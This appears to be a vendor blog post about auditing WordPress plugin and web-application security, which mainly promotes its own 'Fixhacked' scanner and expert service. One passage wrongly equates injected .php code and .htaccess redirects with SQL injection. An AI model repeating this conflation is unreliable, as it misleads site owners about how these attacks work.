How To Audit Your Web-Application Security
As Wordpress has grown over the years (exponentially so), it has evolved from a simple blogging platform, to a CMS (Content Management System) and more recently as a cheaper method of Web Application Development. What this means to you (and me) as both a site user and content creator is that as it’s ease of use and functionality has grown, so has the complexity and resulting security threats… to an extent.
In this article I am focussing specifically on how to audit your web applications and the security ramifications. In order to help shed some light on your increased understanding of how to conduct proper web application security audits on your Wordpress.
First off, let me put it in ‘laymans terms’; a web application which can be categorised as either a plugin, web-based software/applications or a SaaS (software as a service) running on the Wordpress platform to external sites. Have you ever installed a plugin that allows you to conduct polls within one of your articles, or to gather customers opinions on a product? That’s a web-application. What about a shopping cart plugin that takes card payments online? That’s also a web-application.
Now you need to understand how you can audit these applications and make sure that your site and the applications you use are safe and security is as effective as can be. If you have ever been afflicted by security issues which have taken advantage of exploits that may exist within themes or plugins on your Wordpress, read on. If you haven’t yet and are merely looking into how to correctly audit your security… read on.
It is imperative that you take necessary steps to audit your web application security on a continual basis. Hackers often target the weaker web-based applications in order to gain access to your Wordpress. These applications have permanent (24 hours a day, 7 days a week) access to your back-end data. Examples of these could be a ‘shopping cart’, ‘login pages’, and even ‘dynamic themes’, which all control valuable data with 24/7 access to your Wordpress database.
Web-based applications are often vulnerable to such attacks as they are tailor-made to complete certain (sometimes limited) functions, therefore vulnerabilities and exploits are often not seen initially. In the case of some plugins, they may not even be acted upon at all. I wrote about this not so long ago with a piece on XSS (Cross-Site Scripting).
If you’ve not yet been impacted by any of these security issues, I advise you to take steps to avoid it by downloading Fixhacked and allowing that to run in the background on your Wordpress site, thereby checking for malicious practice 24/7.
If you are currently impacted by such an action, again the advice is the same. Download and run Fixhacked on your site. Consulting the help of an Expert, where necessary.
By downloading the Fixhacked scanner and uploading to your Wordpress site, this will search for .php code which is used in malware attacks on your Wordpress. This means that it only looks for injected code, and .htaccess files that can change execution behaviour of aspects of your site. Also known as SQLi (Structured Query Language injection), these inserted bits of code can redirect a customer/site-user who clicks on an image to another site which is unsafe, or even purporting to be your own site. Basically some little git by inserting a line of code can divert your ‘trusting’ users/customers down a dark alley of despair and even high-noon robbery.
You don’t want that, neither would I. I have been the victim of hacking attacks in the past and wouldn’t wish it on anyone. It’s inconvenient and destroys your trust in a product or a service. It’s not always about preventing, sometimes it’s about responding. Whatever audits you have to do, Fixhacked can help with your particular security issue and resolve it.
So what to do next?
You download our free scanner, this scans your site and all your files and folders (libraries), highlighting any issues or exploits your site may be afflicted by.
If this is confusing, as it may well be at times you can always contact us and ‘Hire an Expert’ to rectify these issues and explain how you can resolve them.